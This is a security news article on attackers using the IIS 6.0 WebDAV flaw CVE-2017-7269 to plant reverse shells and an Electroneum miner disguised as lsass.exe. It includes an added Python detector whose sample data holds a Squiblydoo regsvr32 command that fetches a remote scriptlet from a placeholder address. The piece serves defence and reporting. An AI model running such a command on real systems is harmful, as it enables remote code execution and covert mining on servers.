Hackers are leveraging an IIS 6.0 vulnerability to take over Windows servers and install a malware strain that mines the Electroneum cryptocurrency.
Attacks aren't widespread, as they target a quite old IIS version, but they are happening at scale.
Hackers are using CVE-2017-7269 to take over servers. This is a vulnerability in IIS' WebDAV service, disclosed by two Chinese researchers in March 2017. At the time of disclosure last year, the flaw was a zero-day that had already been under heavy exploitation for almost nine months, since June 2016.
Microsoft initially said it was not planning to fix the flaw because IIS 6.0 was end-of-life, and so were the operating systems that shipped with IIS 6.0 by default: Windows XP and Windows Server 2003.
But the vulnerability shared some common traits with the EXPLODINGCAN NSA exploit leaked in April 2017 by the Shadow Brokers, and it eventually received a fix in mid-June 2017.
Since then, it's been used by at least one threat actor to deploy Monero miners on Windows servers still running the old IIS 6.0 version.
Now, F5 Labs says it found another hacker group using the same exploit, but deploying an Electroneum miner instead of Monero.
According to experts, the threat actor uses CVE-2017-7269 to deliver an ASCII shellcode containing a Return-Oriented Programming (ROP) exploit chain that installs a reverse shell on vulnerable hosts.
Attackers then use the reverse shell to download the miner and start the mining process. The infection process is masked by the use of the Squiblydoo technique and by disguising the miner as the legitimate lsass.exe (Local Security Authority Subsystem Service) process.
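As an added defender-side example (not from the article or the F5 Labs report), the following Python flags the two host-level indicators described above over constructed process-creation records: a regsvr32 Squiblydoo launch (scriptlet fetched from a remote URL via scrobj.dll) and an lsass.exe image running outside System32. All paths, URLs and pool hostnames are constructed.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation events (not real telemetry) shaped like the
# two indicators in the article: an lsass.exe masquerade and a Squiblydoo launch.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\lsass.exe",
     "cmdline": r"C:\Windows\System32\lsass.exe"},
    {"image": r"C:\Windows\Temp\lsass.exe",  # miner disguised as lsass.exe
     "cmdline": r"C:\Windows\Temp\lsass.exe -o etn-pool.example:3333"},
    {"image": r"C:\Windows\System32\regsvr32.exe",  # Squiblydoo pattern
     "cmdline": r"regsvr32 /s /n /u /i:http://203.0.113.10/payload.sct scrobj.dll"},
    {"image": r"C:\Windows\System32\regsvr32.exe",  # benign local DLL registration
     "cmdline": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
]

# Squiblydoo: regsvr32 loads scrobj.dll and its /i: argument points at a remote URL.
SQUIBLYDOO_RE = re.compile(r"/i:\s*\S*?(?:https?|ftp)://\S+", re.IGNORECASE)
# The only directory the real LSASS binary runs from.
LEGIT_LSASS_DIRS = {r"c:\windows\system32"}


def is_squiblydoo(cmdline: str) -> bool:
    """True when a regsvr32 command line registers a scriptlet fetched over the network."""
    return "scrobj.dll" in cmdline.lower() and bool(SQUIBLYDOO_RE.search(cmdline))


def is_lsass_masquerade(image: str) -> bool:
    """True when an image named lsass.exe executes from anywhere other than System32."""
    p = PureWindowsPath(image)
    return p.name.lower() == "lsass.exe" and str(p.parent).lower() not in LEGIT_LSASS_DIRS


def triage(events):
    """Return (event_index, reason) pairs for every event matching one of the indicators."""
    hits = []
    for i, ev in enumerate(events):
        if is_squiblydoo(ev["cmdline"]):
            hits.append((i, "squiblydoo"))
        if is_lsass_masquerade(ev["image"]):
            hits.append((i, "lsass_masquerade"))
    return hits


if __name__ == "__main__":
    for idx, reason in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {reason}: {SAMPLE_EVENTS[idx]['cmdline']}")
```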
F5 experts said the Electroneum address they found in attacks held only $99, suggesting they either caught the campaign at its beginning, or the crooks are rotating address IDs to prevent researchers from tracking their entire operation.
These are also not the first crooks to mine Electroneum instead of Monero, the cryptocurrency of choice for all recent illegal mining campaigns. The Dofoil malware campaign also used Electroneum, and so did another coinminer campaign that used the legitimate CertUtil Windows utility to download the mining malware onto users' systems.